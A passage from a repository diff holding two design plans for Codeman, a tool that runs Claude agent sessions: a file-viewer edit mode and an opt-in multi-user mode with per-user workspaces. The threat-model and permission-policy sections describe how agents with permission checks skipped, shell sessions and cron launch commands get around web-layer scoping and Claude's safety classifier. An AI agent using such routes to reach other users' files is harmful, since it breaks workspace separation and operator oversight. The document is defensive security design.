unchanged, and the server re-applies it. Mixed-EOL files use the dominant style, which is lossy for the
|
||||
minority lines; call that out in the response and accept it in v1.
|
||||
|
||||
### 4.3 Encoding
|
||||
|
||||
`buf.toString('utf-8')` on a latin-1 or otherwise non-UTF-8 file yields U+FFFD replacement characters, and
|
||||
writing that back **corrupts the file**. The check is a round-trip:
|
||||
`Buffer.from(decoded, 'utf8').equals(buf)`. If it fails, `editable: false` and the write is refused. This
|
||||
also catches binary content that the NUL sniff misses. A UTF-8 BOM survives because it round-trips as a
|
||||
leading U+FEFF; do not strip it.
|
||||
|
||||
### 4.4 Concurrency with the agent
|
||||
|
||||
The whole use case is editing a file the agent just wrote and may write again. `baseHash` plus 409 is the
|
||||
guard. Do not use mtime alone: agents rewrite files within a single filesystem timestamp tick, and an
|
||||
identical rewrite should not be reported as a conflict.
|
||||
|
||||
### 4.5 Symlinks and TOCTOU
|
||||
|
||||
Covered by `validateSessionFilePath` (escape) plus `wx` temp and `rename` (post-validation swap). One
|
||||
intentional allowance: a symlink whose target is *inside* the workspace is edited through to its target,
|
||||
because `validateSessionFilePath` returns the realpath. That matches what a user tapping the file expects.
|
||||
|
||||
---
|
||||
|
||||
## 5. Frontend design
|
||||
|
||||
All in `panels-ui.js` (prettier-exempt, hand-formatted; match the surrounding style), `index.html`,
|
||||
`styles.css`, `mobile.css`.
|
||||
|
||||
### 5.1 State
|
||||
|
||||
```js
|
||||
filePreviewEdit = { active, sessionId, path, baseHash, eol, original, dirty }
|
||||
```
|
||||
|
||||
Reset in `closeFilePreview()` and on every `openFilePreview()` entry.
|
||||
|
||||
### 5.2 Markup (`index.html:420-432`)
|
||||
|
||||
Add one header button (pencil, `btn-icon-sm`, `id="filePreviewEditBtn"`, hidden by default) next to the
|
||||
copy button, and an edit bar inside the footer region holding Save / Cancel / a dirty dot. Keep the
|
||||
existing footer text element; the edit bar is a sibling toggled by class so the read-mode footer is
|
||||
untouched.
|
||||
|
||||
### 5.3 Behavior
|
||||
|
||||
- `openFilePreview()` shows the Edit button only when the response has `editable: true` and the render took
|
||||
the text branch. Attachment-id previews, media, binary, pdf, docx/pptx and svg all leave it hidden.
|
||||
- **Enter edit**: re-fetch with `edit=1`; on 413 or `editable:false`, toast the reason and stay in read
|
||||
mode. This fetch must **parse the error envelope on non-ok responses**: the existing generic
|
||||
`if (!res.ok) throw new Error('Failed to load file')` pattern (`panels-ui.js:3275`) would swallow the
|
||||
specific "too large to edit here" message, since error envelopes arrive with real 4xx statuses in prod. On success replace the body with `<textarea class="file-preview-editor" spellcheck="false"
|
||||
autocapitalize="off" autocorrect="off" autocomplete="off" wrap="off">` and assign `.value = content`
|
||||
(never `innerHTML`, so no escaping question arises). Do **not** autofocus: on a phone that opens the
|
||||
keyboard before the user has picked a line.
|
||||
- `input` sets `dirty` and enables Save.
|
||||
- **Save**: `PUT` with `baseHash`, `eol`, and `content`. On success update `baseHash`/`original` from the
|
||||
response, leave edit mode, re-render the read view from the local editor value (the response carries
|
||||
metadata only, not content), toast "Saved". On **409** offer `Reload (discard mine)` / `Overwrite`:
|
||||
Reload re-fetches `edit=1` and replaces the buffer; Overwrite re-sends with `force: true`. The 409 body
|
||||
itself carries no state (section 3.3, step 9).
|
||||
- **Cancel / close / Escape while dirty**: `confirm('Discard unsaved changes?')`, consistent with the
|
||||
existing `window.confirm` usage in this codebase (`panels-ui.js:4323`, `app.js:4176`). Note the global
|
||||
Escape handler (`app.js:999-1007`) closes other panels via `closeAllPanels()` but does not touch this
|
||||
overlay today; if Escape-to-close is wired up as part of this work it must go through the same dirty
|
||||
guard.
|
||||
- `copyFilePreviewContent()` copies the live editor value while editing.
|
||||
|
||||
⚠️ Repo gotcha to respect at the fetch call: **Zod `.optional()` rejects `null`**. Build the body with
|
||||
`eol: eol ?? undefined` (or declare `.nullish()`), or the PUT fails `INVALID_INPUT`. This has shipped as a
|
||||
real bug twice.
|
||||
|
||||
### 5.4 Mobile
|
||||
|
||||
- **Sizing.** The window is `80vw/80vh` centered with no mobile override, so when the keyboard opens on iOS
|
||||
the lower half sits behind it. Add a `@media (max-width: 430px)` block using
|
||||
`height: var(--app-height, 100vh)`, full width, no border radius. `--app-height` is already maintained
|
||||
against `visualViewport` by `KeyboardHandler.handleViewportResize()` (`mobile-handlers.js:283-317`), so
|
||||
the editor tracks the keyboard for free.
|
||||
- **iOS zoom.** The editor font must be >= 16px on phones; there is an existing zoom-prevention block at
|
||||
`mobile.css` under `@media (max-width: 768px)`. Verify it covers `textarea` and do not override it with a
|
||||
smaller `rem` value.
|
||||
- **Accessory bar.** Focusing any input fires `KeyboardHandler.onKeyboardShow()`, which calls
|
||||
`KeyboardAccessoryBar.show()` and refits/resizes the terminal (`mobile-handlers.js:407+`). The bar's keys
|
||||
target the **terminal**, not the editor, so an Esc or clear-input tap while editing goes to the agent.
|
||||
The overlay's `z-index: 2000` covers the bar's `51`, so it is not visible, but confirm it is not
|
||||
interactive underneath and consider an explicit `KeyboardAccessoryBar.hide()` while the editor holds
|
||||
focus. This is the item most likely to look "fine on desktop, wrong on the phone".
|
||||
- No header-policy change is needed (section 1), so
|
||||
`test/mobile-header-buttons-policy.test.ts` stays untouched.
|
||||
|
||||
### 5.5 i18n
|
||||
|
||||
`i18n.js` already skips `textarea`, `pre`, `code` and `.file-preview-content` in its `SKIP_SELECTOR`
|
||||
(`i18n.js:20-38`), so file content is never translated. Add zh-CN entries for the new chrome: Edit, Save,
|
||||
Cancel, Unsaved changes, Discard unsaved changes?, File changed on disk, Reload, Overwrite, Saved,
|
||||
Too large to edit here.
|
||||
|
||||
---
|
||||
|
||||
## 6. Docker and remote cases
|
||||
|
||||
Out of scope per the issue, and the current behavior already degrades correctly:
|
||||
|
||||
- **Docker cases**: the workspace is a host directory bind-mounted at the same absolute path, so a host-side
|
||||
write is visible in the container immediately. Edit mode works and needs nothing special. Worth one line
|
||||
in the docs.
|
||||
- **Remote SSH cases**: `workingDir` is a path on the remote host. `validateSessionFilePath` realpaths it
|
||||
locally, which fails, so the write returns 404 exactly like the read routes do today. Confirm the viewer
|
||||
shows a clean empty/error state rather than an unexplained failure, and do not attempt an SFTP path.
|
||||
|
||||
---
|
||||
|
||||
## 7. Tests
|
||||
|
||||
| File | Kind | Covers |
|
||||
| ------------------------------------------- | ----------- | ---------------------------------------------------------------------- |
|
||||
| `test/file-editing-policy.test.ts` | pure unit | `isEditableFileName` (allow + deny + basenames), `isDeniedEditRelativePath`, `detectEol`/`applyEol` round-trip incl. mixed EOL, BOM preservation |
|
||||
| `test/routes/file-write-routes.test.ts` | `app.inject` | The handler order in 3.3, against a **real temp dir** (do not `vi.mock('node:fs')` in this file; set `MockSession.workingDir`, `test/mocks/mock-session.ts:14`) |
|
||||
| extend `test/routes/file-routes.test.ts` | `app.inject` | `edit=1` never truncates; `editable` present on the plain read |
|
||||
|
||||
Status-code caveat for all of these: the route-test harness does not install the server's preSerialization
|
||||
envelope hook, so a handler that *returns* an error envelope answers 200 in tests. The statuses below are
|
||||
only assertable because the plan has the handler **throw** structured errors (section 3.3, error
|
||||
mechanics), which `installRouteErrorHandler` renders identically in prod and in the harness.
|
||||
|
||||
Route cases to assert explicitly:
|
||||
|
||||
1. happy path writes the bytes and returns a new hash
|
||||
2. `../` and absolute paths give 404
|
||||
3. symlink pointing outside the workspace gives 404
|
||||
4. symlink pointing inside is written through to the target
|
||||
5. non-allowlisted extension gives 400
|
||||
6. `.git/config` gives 403
|
||||
7. a `.env` in the workspace gives 403 (sensitive-path)
|
||||
8. a file with a NUL byte gives 400
|
||||
9. a latin-1 file that fails the UTF-8 round-trip gives 400
|
||||
10. stale `baseHash` gives 409 (`CONFLICT` envelope, no data); `force:true` then succeeds
|
||||
11. over `MAX_EDITABLE_BYTES` gives 413
|
||||
12. a path that does not exist gives 404 and creates nothing (no `O_CREAT`)
|
||||
13. multi-user: `authUser: {role:'user'}` against another user's session gives 404 (pass `authUser` to
|
||||
`createRouteTestHarness`, otherwise the synthetic admin makes the test pass vacuously)
|
||||
14. CRLF file edited and saved stays CRLF
|
||||
15. file mode is preserved across the temp-plus-rename
|
||||
|
||||
Run with `npm test -- test/routes/file-write-routes.test.ts`, never bare `npm test`.
|
||||
|
||||
**End-to-end verification before any deploy** (unit tests passing is not sufficient here):
|
||||
|
||||
- `curl -sk https://localhost:3000/...` against a **throwaway** session created for the purpose, never
|
||||
`w1`/`w2`/`w3`; delete it by exact id afterwards.
|
||||
- Playwright on a phone profile: open a preview, tap Edit, type with `page.keyboard.type()`, Save, then
|
||||
assert the bytes on disk changed. Assert real state, not HTTP 200.
|
||||
|
||||
---
|
||||
|
||||
## 8. Docs and release
|
||||
|
||||
- This plan lives at `docs/file-viewer-edit-plan.md`.
|
||||
- `docs/architecture-invariants.md`: new anchor `#file-viewer-edit-mode` covering the write confinement
|
||||
chain, the truncation invariant, and why temp-plus-rename.
|
||||
- `CLAUDE.md`: one line under the **Filesystem path picker** neighborhood noting that the File Viewer now
|
||||
has a **third** file surface and that it is the only one that writes, plus its confinement rules.
|
||||
Remember `CLAUDE.md` is prettier-ignored on purpose.
|
||||
- `docs/api-reference.md`: the new `PUT` and the `edit=1` query.
|
||||
- Release: a normal COM applies (the 1.10.0 batch hold is over). This is a new user-facing feature plus an
|
||||
additive API surface, so **COM minor** when it ships.
|
||||
|
||||
Formatting note: `panels-ui.js`, `styles.css`, `mobile.css`, `index.html` are all in `.prettierignore` and
|
||||
are hand-formatted; new TypeScript (`src/config/file-editing.ts`, route + schema edits) is prettier-enforced
|
||||
and must pass `npm run format:check`.
|
||||
|
||||
---
|
||||
|
||||
## 9. Implementation order
|
||||
|
||||
Each phase is independently reviewable and leaves the tree working.
|
||||
|
||||
1. **Policy module + tests.** `src/config/file-editing.ts` and `test/file-editing-policy.test.ts`. Pure, no
|
||||
route wiring. (Small.)
|
||||
2. **Read-for-edit.** `edit=1` (returning `hash`/`eol`) plus the additive `editable` flag on plain reads,
|
||||
tests. Nothing consumes it yet. (Small.)
|
||||
3. **Write endpoint.** `FileWriteSchema`, `PUT` handler, `test/routes/file-write-routes.test.ts`. Fully
|
||||
testable by curl before any UI exists. (Medium, the security-relevant part.)
|
||||
4. **Desktop UI.** Edit button, textarea swap, Save/Cancel, dirty guard, 409 flow. (Medium.)
|
||||
5. **Mobile pass.** `mobile.css` sizing against `--app-height`, font size, accessory-bar interaction,
|
||||
real-device check. (Small but the part that decides whether the feature is actually usable.)
|
||||
6. **Docs, i18n strings, changeset.**
|
||||
|
||||
---
|
||||
|
||||
## 10. Open decisions
|
||||
|
||||
1. **Editor widget.** Recommend a plain `<textarea>` for v1: zero dependencies, no CSP question, no bundle
|
||||
growth, and it is the only thing guaranteed to behave with the iOS keyboard. CodeMirror-light with
|
||||
syntax highlighting is a clean follow-up once the write path is proven. The issue allows either.
|
||||
2. **Phone entry point.** Edit mode is reachable on a phone through attachment cards and the history
|
||||
drawer without changing anything. A dedicated toolbar or overview affordance for "browse this session's
|
||||
files" would make it discoverable, but it is a separate UX change and would need a decision against the
|
||||
deliberately minimal phone header policy. Recommend deferring it and revisiting after the feature ships.
|
||||
3. **`svg` editability.** Recommend excluded in v1 (it is deliberately treated as untrusted on the read
|
||||
side). Easy to add later.
|
||||
4. **Create / delete / rename.** Explicitly out of scope per the issue. Note that keeping `O_CREAT` out of
|
||||
the handler is what makes that a structural property rather than a convention.
|
||||
|
After Width: | Height: | Size: 357 KiB |
|
After Width: | Height: | Size: 941 KiB |
|
After Width: | Height: | Size: 1.0 MiB |
|
After Width: | Height: | Size: 357 KiB |
|
Before Width: | Height: | Size: 82 KiB |
|
After Width: | Height: | Size: 3.0 MiB |
|
Before Width: | Height: | Size: 28 MiB |
|
After Width: | Height: | Size: 537 KiB |
|
After Width: | Height: | Size: 332 KiB |
|
After Width: | Height: | Size: 808 KiB |
|
Before Width: | Height: | Size: 806 KiB |
@@ -0,0 +1,282 @@
|
||||
# Multi-User Mode: Design Plan
|
||||
|
||||
Status: **IMPLEMENTED on `feat/multiuser-mode`** (phases 1-5; opt-in, off by default). Target: opt-in multi-user support behind a `--multiuser` flag, with per-user case spaces and an admin panel for user management.
|
||||
|
||||
Shipped by phase:
|
||||
|
||||
- **Phase 1** (user store + mode plumbing + CLI): `src/user-store.ts` (scrypt, atomic 0600 writes, last-admin invariants, serialized read-modify-write), `src/config/multiuser.ts`, `codeman users add|passwd|list|rm`, `--multiuser` flag, bootstrap-on-first-boot. Tests: `test/user-store.test.ts`.
|
||||
- **Phase 2** (multi-user auth): parallel async auth branch (`src/web/middleware/auth.ts`), `req.authUser`, per-username rate bucket, `mustChangePassword` lockbox, `GET /api/me` + `POST /api/me/password`, QR identity-bound minting, network-bind + tunnel exemptions, new error codes. Tests: `test/multiuser-auth.test.ts`.
|
||||
- **Phase 3** (ownership threading): `Session.owner` at every create path + recovery mirror; `findSessionOrFail` owner check + list filtering; §6.3 permission policy (`resolveClaudeModeForUser` at all spawn sites incl. one-shots via `buildPromptArgs`; shell/launchCommand grant); per-user case spaces (`resolveCasesDir`) + owner-scoped case list + admin-only host CRUD; `workingDir` confinement; `sessionCapacityState` per-user cap. Tests: `test/ownership-scoping.test.ts`.
|
||||
- **Phase 4** (event fan-out): WS owner gate; SSE per-client identity + `broadcast`/terminal-batch routing (`deriveSseHint`, fail-closed); `getLightState` per-identity filtering; file-route preview/thumbnail/history + `GET /api/search` scoping.
|
||||
- **Phase 5** (admin API + frontend): `src/web/routes/admin-routes.ts` (user CRUD, one-time passwords, last-admin guards, session revoke/kill) + `src/web/admin-audit.ts`; `public/admin-ui.js` (identity boot, change-password modal + interceptor, admin Users tab). Tests: `test/admin-routes.test.ts`, `test/admin-ui.test.ts`.
|
||||
|
||||
Deferred follow-ups (documented, non-blocking): away-digest + subagent/workflow REST-list scoping, push-subscription identity/routing, per-user screenshot subdirs, `linked-cases.json` v2 owner field, `ScheduledRun.owner`, plan-orchestrator internal one-shot mode resolution, and a Playwright browser pass. Phase 6 (login form replacing Basic) remains out of scope.
|
||||
|
||||
## 1. Summary
|
||||
|
||||
Today Codeman is strictly single-user: one optional credential pair (`CODEMAN_USERNAME`/`CODEMAN_PASSWORD`), one shared `~/codeman-cases` folder, one global session list, and a global SSE/WS fan-out. This plan adds an opt-in **multi-user mode**:
|
||||
|
||||
- **Off by default.** Without the flag, behavior stays byte-identical to today (same auth path, same paths, same payloads). All new code is gated behind `isMultiUserMode()`.
|
||||
- **`codeman web --multiuser`** (or `CODEMAN_MULTIUSER=1`) enables named users with individually hashed passwords stored in `~/.codeman/users.json`.
|
||||
- **Each user gets their own space**: `~/codeman-users/<username>/cases/<case>` replaces the shared `~/codeman-cases` for that user. Sessions, cases, attachments, search, digests, and SSE events are scoped to their owner.
|
||||
- **Admin panel** (App Settings, admin-only "Users" tab): create/delete users, change/reset passwords, enable/disable accounts, delete a user's space, see per-user live sessions and disk usage, force logout.
|
||||
|
||||
## 2. Threat Model (read first, be honest about this)
|
||||
|
||||
Multi-user mode is **workspace separation for a trusted team, NOT security isolation between mutually distrusting users**:
|
||||
|
||||
- Every session still runs as the **same OS account** with `claude --dangerously-skip-permissions`. Any user can ask their agent to `cat /home/<host>/codeman-users/otheruser/...`. The web layer enforces scoping; the agent layer cannot.
|
||||
- **Shell sessions and custom launch commands are the bluntest holes**: `SessionMode = 'shell'` hands out a raw shell as the host account, and a cron job's `launchCommand` runs an arbitrary command; no Claude permission classifier is involved in either. These must be gated behind the same grant as bypass (section 6.3), otherwise the `auto`-mode mitigation below is theater.
|
||||
- All sessions share one tmux socket (`-L codeman`), one `~/.claude` (transcripts, credentials, plan usage), one Claude subscription.
|
||||
- Mitigation for stronger isolation: pair a user's cases with **Docker cases** (container per case, `docs/docker-cases.md`), or run separate Codeman instances per user (`CODEMAN_INSTANCE`, separate OS accounts). True per-user OS isolation is explicitly **out of scope** for this feature.
|
||||
- Partial mitigation at the agent layer: non-admin users default to Claude's `auto` permission mode (section 6.3), whose safety classifier blocks destructive actions and credential exfiltration. That reduces, but does not eliminate, cross-user snooping; the `canBypassPermissions` grant reopens it and should be given deliberately.
|
||||
|
||||
This must be stated loudly in `docs/security-architecture.md`, the README section, and the admin panel UI ("Users share the host account; this separates workspaces, it does not sandbox users from each other").
|
||||
|
||||
Also note the flip side: multi-user mode strictly _improves_ today's network posture, because it removes the single shared password and gives every person their own revocable credential.
|
||||
|
||||
## 3. Activation and Mode Rules
|
||||
|
||||
| Condition | Behavior |
|
||||
| ------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| No flag (default) | Exactly today's behavior. `users.json` is never read. Single-user auth via `CODEMAN_PASSWORD` if set. |
|
||||
| `--multiuser` / `CODEMAN_MULTIUSER=1`, `users.json` has users | Multi-user auth active. `CODEMAN_PASSWORD` is ignored for login (warn if set). |
|
||||
| `--multiuser`, no `users.json` (first boot) | Bootstrap: if `CODEMAN_USERNAME`/`CODEMAN_PASSWORD` are set, create that user as the initial admin and continue. Otherwise refuse to start with instructions to run `codeman users add <name> --admin`. Never start multi-user with zero users (there would be no way in). |
|
||||
| `--multiuser` on a non-loopback bind | Allowed without `CODEMAN_PASSWORD`: `server.ts start()` treats "multi-user with >= 1 enabled user" as satisfying the auth requirement in the loud-warning check (wire into the existing `isLoopbackBindHost()` branch). |
|
||||
| Flag later removed | Single-user mode again. Sessions/state that carry `owner` fields keep working (owner is simply ignored); user spaces remain on disk untouched. |
|
||||
|
||||
Plumbing: flag in `src/cli.ts` (web command), env in a new `src/config/multiuser.ts` exporting `isMultiUserMode()`. Per-instance like everything else: a beta instance (`CODEMAN_INSTANCE=beta`) has its own `users.json` via `dataPath()`.
|
||||
|
||||
## 4. Data Model and Disk Layout
|
||||
|
||||
### 4.1 `~/.codeman/users.json` (via `dataPath('users.json')`, mode 0600, atomic write: tmp + rename)
|
||||
|
||||
```jsonc
|
||||
{
|
||||
"version": 1,
|
||||
"users": [
|
||||
{
|
||||
"username": "alice", // canonical lowercase slug
|
||||
"role": "admin", // "admin" | "user"
|
||||
"password": {
|
||||
"algo": "scrypt", // node:crypto scrypt, no new deps
|
||||
"N": 16384,
|
||||
"r": 8,
|
||||
"p": 1,
|
||||
"salt": "<hex 32B>",
|
||||
"hash": "<hex 64B>",
|
||||
},
|
||||
"disabled": false,
|
||||
"mustChangePassword": false, // set by admin reset; gates all API access until changed
|
||||
"canBypassPermissions": false, // permission-mode grant, see section 6.3; false for new users
|
||||
"createdAt": 1752900000000,
|
||||
"lastLoginAt": 1752900000000,
|
||||
},
|
||||
],
|
||||
}
|
||||
```
|
||||
|
||||
- **Username rules**: `^[a-z0-9][a-z0-9_-]{1,31}$` (it becomes a folder name), stored lowercase, unique case-insensitively. Reserve `admin`? No: any name can be admin; role is a field, not a name.
|
||||
- **Hashing**: `scrypt` from `node:crypto` with per-user salt, compared via `timingSafeEqual`. Params stored per record so they can be raised later; verify tolerates old params and rehashes on next successful login.
|
||||
- New module `src/user-store.ts` (mirrors the `remote-hosts.ts` / `docker-hosts.ts` pattern): `readUsers()`, `writeUsers()`, `verifyPassword()`, `createUser()`, `setPassword()`, `deleteUser()`, plus pure helpers (`isValidUsername`, `hashPassword`) that are unit-testable without IO. In-process cache with short TTL like `readSettings`, invalidated on every write; the short TTL also covers the CLI (section 10) editing `users.json` while the server runs (cross-process changes picked up within the TTL).
|
||||
|
||||
### 4.2 User spaces
|
||||
|
||||
```
|
||||
~/codeman-users/
|
||||
alice/
|
||||
cases/
|
||||
my-project/ <- same layout as today's ~/codeman-cases/<case>
|
||||
bob/
|
||||
cases/
|
||||
```
|
||||
|
||||
- New helper in `route-helpers.ts`:
|
||||
`resolveCasesDir(user?: AuthUser): string`
|
||||
single-user mode: returns `CASES_DIR` (today's `~/codeman-cases`); multi-user: returns `join(USER_SPACES_DIR, user.username, 'cases')`, creating it lazily on first use.
|
||||
- `CASES_DIR` stays exported for single-user code paths, but every route usage (see 6) switches to the resolver.
|
||||
- The **user folder** (`~/codeman-users/<username>/`) is the deletion unit for "delete user + space" and leaves room for future per-user extras (uploads, exports) beside `cases/`.
|
||||
- Legacy `~/codeman-cases` in multi-user mode: surfaces to admins only, as a read-only "Unassigned (legacy)" group in the case list, with an admin action `POST /api/admin/cases/assign { case, username }` that `fs.rename`s the folder into a user's space (same-filesystem move, cheap). No automatic migration.
|
||||
|
||||
## 5. Auth Pipeline Changes (`src/web/middleware/auth.ts`)
|
||||
|
||||
Keep the existing single-user branch untouched. Add a parallel multi-user branch selected once at registration time:
|
||||
|
||||
1. **Credential check**: Basic header parsed into `username:password`, verified against the user store (scrypt + `timingSafeEqual`). Disabled users fail closed.
|
||||
2. **Cookie sessions**: same `codeman_session` cookie and `StaleExpirationMap`, but `AuthSessionRecord` gains `username` and `role`. All existing TTL/sliding/eviction logic reused. Eviction cap becomes per-user aware (evict oldest _of that user_ first) so one user cannot flush everyone's sessions by logging in 100 times.
|
||||
3. **Request identity**: decorate `req.authUser = { username, role }` (Fastify decorateRequest). In single-user mode `req.authUser` is `{ username: 'admin', role: 'admin' }` when auth is on, and a synthetic admin when auth is off, so downstream code has ONE code path.
|
||||
4. **Rate limiting**: keep the per-IP bucket; add a per-username failure bucket (same `StaleExpirationMap` pattern) so a botnet cannot brute-force one account across IPs, and one flaky user behind a NAT cannot lock out the rest.
|
||||
5. **`mustChangePassword` gate**: when set, every API request except `GET /api/me`, `POST /api/me/password`, and static assets returns 403 with `errorCode: 'PASSWORD_CHANGE_REQUIRED'`; the frontend intercepts that code and shows the change-password modal.
|
||||
6. **Password change vs Basic-auth caching**: browsers cache Basic credentials. After a password change we revoke all of that user's cookie sessions; the next request falls to Basic with stale creds, gets 401, and the browser re-prompts. Acceptable for v1; a proper login form is Phase 6 (see 15).
|
||||
7. **Unchanged**: hook-secret loopback bypass (hooks authenticate the _instance_, not a user; the event maps to a session which has an owner), host guard, Origin/CSRF guard, security headers.
|
||||
8. **WS upgrade identity** (`ws-routes.ts`): the global auth `onRequest` hook does run on the upgrade request (`@fastify/websocket` v11 runs hooks before the handshake; browsers send the session cookie), but the route handler itself only checks Host/Origin and never learns WHO authenticated. Multi-user: the handler reads the decorated `req.authUser` and closes 4003 unless owner or admin (section 6.4; identity plumbing lands in Phase 2, the owner check in Phase 4 once sessions have owners). Add a regression test that an upgrade with no credentials is rejected while auth is active: the handler-level Host/Origin gate alone must never be mistaken for auth.
|
||||
9. **QR auth** (`/q/:code` redemption in `system-routes.ts`, minting in `tunnel-manager.ts`): today there is ONE global token, auto-rotated every 60s with a 90s grace window. A globally-rotating token cannot carry an identity (every logged-in user sees the same code), so multi-user mode replaces rotation with **on-demand minting**: an authenticated `POST /api/tunnel/qr` mints a single-use, short-TTL token bound to `req.authUser.username` (field on `QrTokenRecord`); redemption creates a cookie session for that user. Existing rate-limit buckets (`qrAuthFailures`, global `QR_RATE_LIMIT_MAX`) apply unchanged. Single-user mode keeps the rotating token.
|
||||
|
||||
New error codes in `src/types/api.ts`: `FORBIDDEN`, `PASSWORD_CHANGE_REQUIRED`, `USER_EXISTS`, `USER_NOT_FOUND`, `LAST_ADMIN`.
|
||||
|
||||
Role guard helper in `route-helpers.ts`: `requireAdmin(req, reply): boolean` used as the first line of every admin handler (403 `FORBIDDEN`), plus `requireOwnerOrAdmin(req, session)`.
|
||||
|
||||
## 6. Ownership Threading (the big refactor)
|
||||
|
||||
### 6.1 Sessions
|
||||
|
||||
- `Session` gains `owner?: string` (constructor option), persisted in `SessionState.owner`, included in `toState()`, round-tripped through recovery (`mux-sessions.json` entries carry it, `restoreMuxSessions` passes it back, exactly like `remote`/`docker`).
|
||||
- Every session-creating path stamps the owner from `req.authUser`. Verified inventory of `new Session(...)` call sites: `POST /api/sessions` (session-routes.ts:444), `POST /api/quick-start` (:1956), `POST /api/run` one-shot (:1652), Ralph start (ralph-routes.ts:327), **cron** (cron-service.ts:352; `CronJob` gains `owner`, stamped at job create, launched as the job's owner), legacy `ScheduledRun` loop (server.ts:1603), plan generation + plan-orchestrator agents (plan-routes.ts:128, plan-orchestrator.ts:422/578; owner = requesting user), and recovery (server.ts:2225, next bullet). Two non-paths, also verified: **respawn never constructs a new Session** (it re-spawns the PTY on the same object, so `owner` survives automatically; no inheritance logic needed), and **orchestrator-loop creates no sessions** (it schedules work onto existing idle sessions via the task queue; its scoping requirement is different: it must only pick idle sessions owned by the goal's creator).
|
||||
- Recovery: `owner` must ALSO be mirrored on `MuxSession` (mux-sessions.json) and read back mux-first like `remote`/`docker` (`muxSession.owner ?? savedState?.owner`, the server.ts:2246-2250 pattern), or a reboot erases ownership on the next persist.
|
||||
- Every session-reading/mutating route filters: non-admin users only see and act on `session.owner === req.authUser.username`. Centralize in `findSessionOrFail` (route-helpers.ts:87; the owner check there covers the 6 route files that use it: system/session/respawn/ralph/file/plan-routes) and in the list endpoints (`GET /api/sessions`, `GET /api/sessions/unified`, `GET /api/status`). The Phase 3 audit must grep for BOTH `sessionManager.getSession` AND direct map access (`ctx.sessions.get(` / `.has(`): ws-routes and hook-event-routes reach sessions that way and bypass `findSessionOrFail`.
|
||||
- Admins see everything; every session row carries `owner` so the UI can badge it.
|
||||
|
||||
### 6.2 Cases
|
||||
|
||||
- All `CASES_DIR` call sites switch to `resolveCasesDir(req.authUser)`: `case-routes.ts` (list/create/delete/CLAUDE.md scaffolding, name-collision checks, docker quickcreate), `session-routes.ts` (quick-start case resolution, the workingDir-inside-cases env-strip check), `ralph-routes.ts` (case path resolution), and `plan-routes.ts:231` (easy to miss). Case-name-to-path resolution is currently DUPLICATED (`resolveCasePath` in case-routes.ts:82 and an inline copy in quick-start, session-routes.ts:1846-1863); consolidate into one owner-aware resolver as part of this refactor instead of patching both copies.
|
||||
- Registries that map case names to metadata become owner-scoped. `remote-cases.json`/`docker-cases.json` are arrays of objects, so entries simply gain `owner?: string` (absent = legacy: admin-only). `linked-cases.json` is a flat `Record<caseName, path>` with no room for a field: it needs a v2 shape (`{ "version": 2, "cases": { "<name>": { "path": "...", "owner": "..." } } }`) with read-time migration of the v1 form; it is read in two places (case-routes AND inline in quick-start), both must move to the new reader. Case names only need to be unique per user.
|
||||
- **Remote hosts and Docker hosts are machine-level resources**: CRUD on `/api/docker-hosts` and remote-host endpoints becomes admin-only in multi-user mode; regular users can _use_ hosts on their own cases but not define them. (Docker containers exec as the host account; letting any user define arbitrary `docker run` args is admin-equivalent.)
|
||||
- Case deletion, exports (`docker-exports/`), and imports check ownership; export filenames get an owner prefix to avoid collisions (fits the existing `^[a-zA-Z0-9._-]+\.tgz$` download guard).
|
||||
- **Workspace confinement for non-admins (the linchpin, do not skip)**: today `POST /api/sessions` accepts ANY host directory as `workingDir` (the only check is `statSync().isDirectory()`, session-routes.ts:305-318), and file-routes/attachments confine reads to `session.workingDir`. Without a new rule the whole scoping story is circular: a user points a session at `~/codeman-users/bob` (or `/home`) and the web layer itself serves that subtree, no agent needed. Rule: in multi-user mode a non-admin's `workingDir` must realpath-resolve inside their own space, enforced at `POST /api/sessions`, `POST /api/run`, cron job create AND fire time (the dir can change owners between the two), and Ralph auto-configure. Admins are unrestricted. This one rule is what makes the section 6.4 file-route line ("own space or own sessions' workingDirs") meaningful.
|
||||
|
||||
### 6.3 Per-user Claude permission-mode policy
|
||||
|
||||
Codeman now ships a global **Startup Mode** picker (App Settings, Claude CLI tab: `settings.claudeMode`, values `dangerously-skip-permissions` (default) | `auto` | `normal` | `allowedTools`; `auto` emits `--permission-mode auto`, Anthropic's classifier-guarded low-prompt mode). Multi-user mode layers a per-user policy on top of it:
|
||||
|
||||
- **Default for regular users: `auto` only.** A non-admin's Claude sessions are forced to `--permission-mode auto` regardless of the global `claudeMode` setting. `normal` and `allowedTools` are also permitted (they are strictly more restrictive than auto), but `dangerously-skip-permissions` is NOT.
|
||||
- **Bypass is an explicit admin grant**: `canBypassPermissions: true` on the user record (default `false`, section 4.1). Only with that grant does the global skip-permissions default (or a future per-user choice) apply to their sessions.
|
||||
- **Admins** are unrestricted; the global setting applies to them as-is.
|
||||
- **Single enforcement point**: a pure `resolveClaudeModeForUser(globalMode, user)` in `user-store.ts`, applied server-side at option-resolution time, BEFORE the Session constructor, so both downstream arg builders inherit it for free (`buildPermissionArgs` in session-cli-builder.ts for the direct-PTY path AND `buildClaudePermissionFlags` in tmux-manager.ts for tmux panes; there are two builders, not one). Call sites where `getClaudeModeConfig()` feeds a spawn: session-routes.ts:452/1964, ralph-routes.ts:334, cron-service.ts:360, and recovery (server.ts:2214/2233). Recovery re-reads the GLOBAL setting on reboot, so the resolver must run there with the RECOVERED owner, or a restart silently un-downgrades every restored session. Never resolved in the frontend, so it cannot be bypassed via payload.
|
||||
- **Downgrade, don't error**: a non-granted user whose effective mode would be bypass gets `auto` silently (logged + surfaced as a badge on the session), so shared presets keep working.
|
||||
- **Other CLIs' bypass equivalents** follow the same grant: Codex `--dangerously-bypass-approvals-and-sandbox` (`codexDangerouslyBypassApprovals`) and Gemini `--approval-mode yolo` are refused for non-granted users (Gemini falls back to `auto_edit`, Codex to its default sandbox). Whether this stays one grant or splits per-CLI is an open question (section 15).
|
||||
- **Shell mode and custom launch commands follow the grant too**: `mode: 'shell'` sessions and cron `launchCommand` are arbitrary command execution as the host account, strictly stronger than any bypass flag, and no permission-mode downgrade applies to them. Non-granted users get 403 `FORBIDDEN` on shell session/quick-start creation and on cron jobs carrying `launchCommand` (checked at create AND at fire time). Folding them under `canBypassPermissions` keeps the model one-bit; section 15 asks whether it should split.
|
||||
- **Admin UI**: a "Can skip permissions" toggle per user in the Users tab (PATCH field, section 8), with a warning echoing the section 2 threat model.
|
||||
